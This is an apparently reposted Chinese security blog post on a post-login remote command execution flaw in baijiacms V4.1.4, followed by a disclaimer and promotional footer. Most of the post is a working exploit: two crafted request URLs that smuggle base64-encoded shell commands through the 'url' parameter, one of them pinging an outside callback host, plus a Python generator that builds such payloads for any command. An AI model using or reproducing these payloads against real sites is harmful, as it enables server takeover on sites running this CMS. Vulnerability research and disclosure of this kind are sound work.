baijiacms后台RCE
项目地址:https://github.com/baijiacms/baijiacmsV4
版本:V4.1.4 20170105 FINAL 环境:
-
php 5.5.38
-
nginx 1.15
-
mysql 5.7.27
-
20.04.1-Ubuntu
README_en
漏洞点在文件includes/baijiacms/common.inc.php 第654行。
利用
这个system的功能本来是为了执行压缩图片的。所以要利用该漏洞,需要先登录后台,在附近设置中设置图片压缩比例,否则代码无法运行到此处。
EXP1:http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/poc.;echo${IFS}cGluZyBwb2MuZXhyNm1xLmNleWUuaW8gLWMgNA==| base64${IFS}-d|bash;&status=1&beid=1
EXP2:http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/whoami.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;&status=1&beid=1
其中poc可以使用一下代码生成,随后开启web服务确保可以被访问到即可
import base64
webpath = "/home/ubuntu/test/"
cmd = input("cmd>>> ")
b64cmd = base64.b64encode(cmd.encode()).decode()
payload = f"echo {b64cmd}|base64 -d|bash"
print(payload)
payload = payload.replace(' ','${IFS}')
print(payload)
name = input("name>>>")
payload = f"{name}.;{payload};"
print(payload)
with open(file=webpath+payload,mode='w')as f:
f.write('1')
关 注 有 礼
欢迎关注公众号:网络安全者
后台回复:20221121
获取每日抽奖送书
本文内容来自网络,如有侵权请联系删除
原文始发于微信公众号(网络安全者):baijiacms漏洞验证
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论